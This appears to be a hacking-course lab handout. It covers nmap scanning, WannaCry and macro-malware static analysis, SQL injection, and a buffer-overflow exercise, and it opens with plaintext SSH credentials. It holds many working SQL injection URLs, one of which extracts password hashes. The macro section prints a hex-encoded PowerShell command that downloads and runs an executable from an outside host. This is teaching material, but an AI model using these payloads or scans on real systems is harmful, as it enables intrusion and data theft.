Just playing around....

1. #########################
2. # Connect to the server #
3. #########################
4.  
5. Use Putty to SSH into my Ubuntu host in order to perform the lab tasks below.
6.  
7. You can download Putty from here:
8. http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
9.  
10.  
11. IP Address: 144.202.37.49
12. Protocol: ssh
13. Port: 22
14. username: np
15. password: n3ts1m123!
16.  
17.  
18.  
19.  
20. ########################
21. # Scanning Methodology #
22. ########################
23.  
24. - Ping Sweep
25. What's alive?
26. ------------
27.  
28. ---------------------------Type This-----------------------------------
29. sudo nmap -sP 157.166.226.*
30.  
31. -----------------------------------------------------------------------
32.  
33.  
34.  
35. -if -SP yields no results try:
36. ---------------------------Type This-----------------------------------
37. sudo nmap -sL 157.166.226.*
38.  
39. -----------------------------------------------------------------------
40.  
41.  
42.  
43. -Look for hostnames:
44. ---------------------------Type This-----------------------------------
45. sudo nmap -sL 157.166.226.* | grep com
46.  
47. -----------------------------------------------------------------------
48.  
49.  
50.  
51. - Port Scan
52. What's where?
53. ------------
54. ---------------------------Type This-----------------------------------
55. sudo nmap -sS 162.243.126.247
56.  
57. -----------------------------------------------------------------------
58.  
59.  
60.  
61. - Bannergrab/Version Query
62. What versions of software are running
63. -------------------------------------
64.  
65. ---------------------------Type This-----------------------------------
66. sudo nmap -sV 162.243.126.247
67.  
68. -----------------------------------------------------------------------
69.  
70.  
71.  
72.  
73. - Vulnerability Research
74. Lookup the banner versions for public exploits
75. ----------------------------------------------
76. http://exploit-db.com
77. http://securityfocus.com/bid
78. https://packetstormsecurity.com/files/tags/exploit/
79.  
80. ---------------------------------------------------------------------------------------------------------------------------------
81. The purpose of this class is to help students learn how to address the common issues in Hacking Challenge Lab courses.
82.  
83.  
84. Issue 1. Lack of a thorough attack process
85. ==========================================
86. - Host discovery
87. - Service discovery
88. - Service version discovery
89. - Vulnerability research
90. - Linux (port 111)/Window (port 445) Enumeration
91. - Webserver vulnerability scan
92. - Directory brute force every webserver
93. - Analyze source code of every web app (look for IPs, usernames/passwords, explanations of how stuff works)
94. - Brute force all services
95.  
96.  
97. Issue 2. Lack of automation of the process
98. ==========================================
99. - Research attacks scripts on the internet to enhance your methodology
100.  
101.  
102. Issue 3. Failing to document all steps being performed and their output
103. =======================================================================
104.  
105.  
106. Issue 4. Lack of sleep during the exam
107. ======================================
108.  
109.  
110. Issue 5. Failing to reboot target machines prior to attack
111. ==========================================================
112.  
113.  
114.  
115. --------------------------------------------------------------------------------------------------------------
116.  
117.  
118. A good strategy to use to prepare would be:
119.  
120. Step 1. Ensure that you are comfortable with Linux
121. --------------------------------------------------
122. - LinuxSurvival.com (you should be able to comfortably pass all 4 quizzes)
123. - Comptia Linux+ (You should be just a hair under a Linux system administrator in skill level, simple shell scripting, and well beyond a Linux user skill level)
124.  
125. You should be very comfortable with the material covered in the videos below (Go through all of them twice if you are new to Linux):
126. https://www.youtube.com/playlist?list=PLCDA423AB5CEC8FDB
127. https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK
128. https://www.youtube.com/playlist?list=PLcUid3OP_4OXOUqYTDGjq-iEwtBf-3l2E
129.  
130.  
131.  
132. 2. You should be comfortable with the following tools:
133. ------------------------------------------------------
134.  
135. Nmap:
136. https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBsINfLVidNVaZ-7_v1NJIo
137.  
138. Metasploit:
139. https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBmwvjJoWhM4Lg5MceSbsja
140.  
141. Burp Suite:
142. https://www.youtube.com/playlist?list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
143.  
144. Sqlmap:
145. https://www.youtube.com/playlist?list=PLA3E1E7A07FD60C75
146.  
147. Nikto:
148. https://www.youtube.com/watch?v=GH9qn_DBzCk
149.  
150. Enum4Linux:
151. https://www.youtube.com/watch?v=hA5raaGOQKQ
152.  
153. RPCINFO/SHOWMOUNT:
154. https://www.youtube.com/watch?v=FlRAA-1UXWQ
155.  
156. Hydra:
157. https://www.youtube.com/watch?v=rLtj8tEmGso
158.  
159.  
160.  
161. 3. You need to comfortable with basic exploit development
162. ---------------------------------------------------------
163.  
164. Basic assembly:
165. https://www.youtube.com/playlist?list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB
166.  
167. Basic exploit development (first 5 videos in the playlist):
168. https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
169.  
170.  
171. 4. You need to be comfortable with privilege escalation
172. -------------------------------------------------------
173. Linux
174. https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
175.  
176. Windows
177. https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
178. http://www.fuzzysecurity.com/tutorials/16.html
179.  
180. ----------------------------------------------------------------------------------------------------------------------------------
181.  
182.  
183. ###################
184. # Static Analysis #
185. ###################
186.  
187. - After logging please open a terminal window and type the following commands:
188.  
189.  
190. ---------------------------Type This-----------------------------------
191. cd ~
192.  
193. mkdir static_analysis
194.  
195. cd static_analysis
196.  
197. wget http://45.63.104.73/wannacry.zip
198.  
199. unzip wannacry.zip
200. infected
201.  
202. file wannacry.exe
203.  
204. mv wannacry.exe malware.pdf
205.  
206. file malware.pdf
207.  
208. mv malware.pdf wannacry.exe
209.  
210. hexdump -n 2 -C wannacry.exe
211.  
212. ----------------------------------------------------------------------
213.  
214.  
215. ***What is '4d 5a' or 'MZ'***
216. Reference:
217. http://www.garykessler.net/library/file_sigs.html
218.  
219.  
220.  
221.  
222. ---------------------------Type This-----------------------------------
223. objdump -x wannacry.exe
224.  
225. strings wannacry.exe
226.  
227. strings wannacry.exe | grep -i dll
228.  
229. strings wannacry.exe | grep -i library
230.  
231. strings wannacry.exe | grep -i reg
232.  
233. strings wannacry.exe | grep -i key
234.  
235. strings wannacry.exe | grep -i rsa
236.  
237. strings wannacry.exe | grep -i open
238.  
239. strings wannacry.exe | grep -i get
240.  
241. strings wannacry.exe | grep -i mutex
242.  
243. strings wannacry.exe | grep -i irc
244.  
245. strings wannacry.exe | grep -i join
246.  
247. strings wannacry.exe | grep -i admin
248.  
249. strings wannacry.exe | grep -i list
250. ----------------------------------------------------------------------
251.  
252.  
253. #####################################################
254. # Analyzing Macro Embedded Malware #
255. #####################################################
256. ---------------------------Type This-----------------------------------
257. mkdir ~/oledump
258.  
259. cd ~/oledump
260.  
261. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
262.  
263. unzip oledump_V0_0_22.zip
264.  
265. wget http://45.63.104.73/064016.zip
266.  
267. unzip 064016.zip
268. infected
269.  
270. python oledump.py 064016.doc
271.  
272. python oledump.py 064016.doc -s A4 -v
273. -----------------------------------------------------------------------
274.  
275.  
276.  
277. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
278. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
279.  
280. ---------------------------Type This-----------------------------------
281. python oledump.py 064016.doc -s A5 -v
282. -----------------------------------------------------------------------
283.  
284. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
285.  
286. ---------------------------Type This-----------------------------------
287. python oledump.py 064016.doc -s A3 -v
288.  
289. - Look for "GVhkjbjv" and you should see:
290.  
291. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
292.  
293. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
294. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
295. -----------------------------------------------------------------------
296.  
297. ##################################
298. # Basic: Web Application Testing #
299. ##################################
300.  
301. Most people are going to tell you reference the OWASP Testing guide.
302. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
303.  
304. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
305.  
306.  
307. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
308.  
309. 1. Does the website talk to a DB?
310. - Look for parameter passing (ex: site.com/page.php?id=4)
311. - If yes - try SQL Injection
312.  
313. 2. Can I or someone else see what I type?
314. - If yes - try XSS
315.  
316. 3. Does the page reference a file?
317. - If yes - try LFI/RFI
318.  
319. Let's start with some manual testing against 45.77.162.239
320.  
321.  
322. Start here:
323. ---------------------------Paste this into Firefox-----------------------------------
324. http://45.77.162.239/
325. -----------------------------------------------------------------------
326.  
327. Let's try throwing a single quote (') in there:
328. ---------------------------Paste this into Firefox-----------------------------------
329. http://45.77.162.239/bookdetail.aspx?id=2'
330. -------------------------------------------------------------------------------------
331.  
332. I get the following error:
333.  
334. Unclosed quotation mark after the character string ''.
335. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
336.  
337. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
338.  
339.  
340.  
341.  
342.  
343.  
344.  
345.  
346.  
347.  
348. #########################################################################################
349. # SQL Injection #
350. # https://s3.amazonaws.com/infosecaddictsfiles/1-Intro_To_SQL_Intection.pptx #
351. #########################################################################################
352.  
353.  
354. - Another quick way to test for SQLI is to remove the parameter value
355.  
356.  
357. #############################
358. # Error-Based SQL Injection #
359. #############################
360. ---------------------------Paste these one line at a time into Firefox-----------------------------------
361. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
362. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
363. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
364. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
365. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
366. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
367. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
368. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
369. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
370. ---------------------------------------------------------------------------------------------------------
371.  
372.  
373.  
374.  
375.  
376. #############################
377. # Union-Based SQL Injection #
378. #############################
379. ---------------------------Paste these one line at a time into Firefox-----------------------------------
380. http://45.77.162.239/bookdetail.aspx?id=2 order by 100--
381. http://45.77.162.239/bookdetail.aspx?id=2 order by 50--
382. http://45.77.162.239/bookdetail.aspx?id=2 order by 25--
383. http://45.77.162.239/bookdetail.aspx?id=2 order by 10--
384. http://45.77.162.239/bookdetail.aspx?id=2 order by 5--
385. http://45.77.162.239/bookdetail.aspx?id=2 order by 6--
386. http://45.77.162.239/bookdetail.aspx?id=2 order by 7--
387. http://45.77.162.239/bookdetail.aspx?id=2 order by 8--
388. http://45.77.162.239/bookdetail.aspx?id=2 order by 9--
389. http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
390. ---------------------------------------------------------------------------------------------------------
391.  
392. We are using a union select statement because we are joining the developer's query with one of our own.
393. Reference:
394. http://www.techonthenet.com/sql/union.php
395. The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
396. It removes duplicate rows between the various SELECT statements.
397.  
398. Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
399. ---------------------------Paste these one line at a time into Firefox-----------------------------------
400. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
401. ---------------------------------------------------------------------------------------------------------
402. Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
403.  
404. ---------------------------Paste these one line at a time into Firefox-----------------------------------
405. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
406. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
407. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
408. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
409. ---------------------------------------------------------------------------------------------------------
410.  
411.  
412.  
413.  
414. - Another way is to see if you can get the backend to perform an arithmetic function
415. ---------------------------Paste these one line at a time into Firefox-----------------------------------
416. http://45.77.162.239/bookdetail.aspx?id=(2)
417. http://45.77.162.239/bookdetail.aspx?id=(4-2)
418. http://45.77.162.239/bookdetail.aspx?id=(4-1)
419. ---------------------------------------------------------------------------------------------------------
420.  
421. - This is some true/false logic testing
422. ---------------------------Paste this into Firefox-----------------------------------
423. http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--
424. http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
425. http://45.77.162.239/bookdetail.aspx?id=1*1
426. http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#
427. http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
428. http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
429. http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--
430. http://45.77.162.239/bookdetail.aspx?id=2 &0#
431. -------------------------------------------------------------------------------------
432.  
433. -- Now that we've seen the differences in the webpage with True/False SQL Injection - let's see what we can learn using it
434. ---------------------------Paste this into Firefox-----------------------------------
435. http://45.77.162.239/bookdetail.aspx?id=2 and 1=1--
436. http://45.77.162.239/bookdetail.aspx?id=2 and 1=2--
437. http://45.77.162.239/bookdetail.aspx?id=2 and user='joe' and 1=1--
438. http://45.77.162.239/bookdetail.aspx?id=2 and user='dbo' and 1=1--
439. ---------------------------------------------------------------------------------------
440.  
441.  
442. ###############################
443. # Blind SQL Injection Testing #
444. ###############################
445. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
446.  
447. 3 - Total Characters
448. ---------------------------Paste these one line at a time into Firefox-----------------------------------
449. http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
450. http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
451. http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
452. ---------------------------------------------------------------------------------------------------------
453.  
454. Let's go for a quick check to see if it's DBO
455. ---------------------------Paste this into Firefox-----------------------------------
456. http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
457. -------------------------------------------------------------------------------------
458. Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
459.  
460. D - 1st Character
461. ---------------------------Paste these one line at a time into Firefox-----------------------------------
462. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
463. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
464. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
465. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
466. ---------------------------------------------------------------------------------------------------------
467.  
468. B - 2nd Character
469. ---------------------------Paste these one line at a time into Firefox-----------------------------------
470. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
471. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
472. ---------------------------------------------------------------------------------------------------------
473.  
474. O - 3rd Character
475. ---------------------------Paste these one line at a time into Firefox-----------------------------------
476. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
477. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
478. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
479. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
480. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
481. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
482. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
483. ---------------------------------------------------------------------------------------------------------
484.  
485. #####################################
486. # Quick Stack Based Buffer Overflow #
487. #####################################
488.  
489. - You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
490. http://45.63.104.73/ExploitLab.zip
491.  
492.  
493. - Extract the ExploitLab.zip file to your Desktop
494.  
495. - Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
496.  
497. - Open a new command prompt and type:
498.  
499. ---------------------------Type This-----------------------------------
500.  
501. nc localhost 9999
502. --------------------------------------------------------------------------
503.  
504. - In the new command prompt window where you ran nc type:
505. HELP
506.  
507. - Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
508. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
509.  
510. - Now double-click on 1-simplefuzzer.py
511. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
512.  
513.  
514. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
515.  
516. - Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
517.  
518. - Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
519.  
520. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
521.  
522. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
523.  
524. - Calculate the distance to EIP by running script 3-3000chars.py
525. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
526.  
527. 4-count-chars-to-EIP.py
528. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
529. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
530.  
531. 5-2006char-eip-check.py
532. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
533.  
534. 6-jmp-esp.py
535. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
536.  
537. 7-first-exploit
538. - In this script we actually do the stack overflow and launch a bind shell on port 4444
539.  
540. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
541.  
542.  
543. ------------------------------
544.  
545.  
546.  
547. #########################################
548. # FreeFloat FTP Server Exploit Analysis #
549. #########################################
550.  
551.  
552.  
553. Analyze the following exploit code:
554. https://www.exploit-db.com/exploits/15689/
555.  
556. 1. What is the target platform that this exploit works against?
557. 2. What is the variable name for the distance to EIP?
558. 3. What is the actual distance to EIP in bytes?
559. 4. Describe what is happening in the variable ‘junk2’
560.  
561.  
562.  
563.  
564. Analysis of the training walk-through based on EID: 15689:
565. http://45.63.104.73/ff.zip
566.  
567.  
568.  
569.  
570. ff1.py
571. 1. What does the sys module do? Call System Commands
572. 2. What is sys.argv[1] and sys.argv[2]?
573. 3. What application entry point is being attacked in this script?
574.  
575.  
576.  
577. ff2.py
578. 1. Explain what is happening in lines 18 - 20 doing.
579. 2. What pattern_create.rb doing and where can I find it?
580. 3. Why can’t I just double click the file to run this script?
581.  
582.  
583.  
584. ff3.py
585. 1. Explain what is happening in lines 17 - to 25?
586. 2. Explain what is happening in lines 30 - to 32?
587. 3. Why is everything below line 35 commented out?
588.  
589.  
590.  
591. ff4.py
592. 1. Explain what is happening in lines 13 - to 15.
593. 2. Explain what is happening in line 19.
594. 3. What is the total length of buff?
595.  
596.  
597.  
598. Ff5.py
599. 1. Explain what is happening in line 15.
600. 2. What is struct.pack?
601. 3. How big is the shellcode in this script?
602.  
603.  
604.  
605. ff6.py
606. 1. What is the distance to EIP?
607. 2. How big is the shellcode in this script?
608. 3. What is the total byte length of the data being sent to this app?
609.  
610.  
611.  
612.  
613. ff7.py
614. 1. What is a tuple in python?
615. 2. How big is the shellcode in this script?
616. 3. Did your app crash in from this script?
617.  
618.  
619.  
620.  
621. ff8.py
622. 1. How big is the shellcode in this script?
623. 2. What is try/except in python?
624. 3. What is socket.SOCK_STREAM in Python?
625.  
626.  
627.  
628. ff9.py
629. 1. What is going on in lines 19 and 20?
630. 2. What is the length of the NOPs?
631. 3. What is socket.SOCK_STREAM in Python?
632.  
633.  
634.  
635.  
636. ff010.py
637. 1. What is going on in lines 18 - 20?
638. 2. What is going on in lines 29 - 32?
639. 3. How would a stack adjustment help this script?
640.  
641.  
642. Required review videos to watch tonight:
643. ----------------------------------------
644. https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
645. Please watch videos 1-5 tonight. Vivek has a deep accent so I understand that it may be difficult but his material is very good - probably the best on the internet today.
646.  
647. Recommended (not required) videos to watch tonight:
648. ---------------------------------------------------
649. For more background on Assembly I would recommend the following video series (videos 1-11):
650. https://www.youtube.com/playlist?list=PL6brsSrstzga43kcZRn6nbSi_GeXoZQhR
651. Again, you DO NOT have to watch these tonight but if you are really interested in the subject of exploit development I think they will be very helpful.
652.  
653.  
654.  
655. ---------------------------------------------------------------------------------------------------------------------